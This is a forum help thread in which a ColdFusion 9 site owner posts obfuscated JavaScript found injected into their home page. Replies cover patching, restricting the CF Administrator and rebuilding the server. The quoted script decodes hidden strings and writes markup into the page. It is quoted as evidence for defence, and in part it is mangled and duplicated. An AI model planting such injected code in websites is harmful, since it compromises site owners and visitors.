nachtmsk
asked on
Coldfusion Hack of some type
Hi,
I have a site running CF9. It's been running for a few years with no major problems.
Today I noticed my home page timestamp had changed. When I compared the code to the back up version I found some javascript inserted that I definitely did not put in.
The code is below.
What are some of the common ways this could have gotten inserted and what can/should I do to protect my server?
Thanks,
Nacht
<script language="JavaScript">func tion zdrViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','888791 8192818786 3473749187 8493927735 9287883421 3333333388 96','99779 18890','94 9990793917 9479989425 77939317') ,l=x.lengt h;while(++ a<=l){m=x[ l-a];
t=z='';
for(v=0;v<m.length;){t+=m. charAt(v++ );
if(t.length==2){z+=String. fromCharCo de(parseIn t(t)+25-l+ a);
t='';}}x[l-a]=z;}document. write('<'+ x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+ '}</'+x[0] +'>');}zdr ViewState( );
</script>
I have a site running CF9. It's been running for a few years with no major problems.
Today I noticed my home page timestamp had changed. When I compared the code to the back up version I found some javascript inserted that I definitely did not put in.
The code is below.
What are some of the common ways this could have gotten inserted and what can/should I do to protect my server?
Thanks,
Nacht
<script language="JavaScript">func
{
var a=0,m,v,t,z,x=new Array('9091968376','888791
t=z='';
for(v=0;v<m.length;){t+=m.
if(t.length==2){z+=String.
t='';}}x[l-a]=z;}document.
</script>
Have you installed all the updates to CF9? Do you have your CF Administrator locked down or delete from the production server? Are you running Windows or Linux?
ASKER
@Rick : I am running Windows Server 2008. I think I have all the updates to CF9, but I'm not certain, I will check that out.
When you say do I have CF admin locked down, what do you mean exactly?
Thanks,
Nacht
When you say do I have CF admin locked down, what do you mean exactly?
Thanks,
Nacht
Basically you should not be able to get to the ColdFusion Administrators site from the internet. You need to check this on every site you have setup.
Check this site out. Has a link to a tester.
ASKER
@Rick -- you forgot to put the link to that site you mentioned :)
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
I agree with SidFishes that the safest thing to do is format and start over.
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354228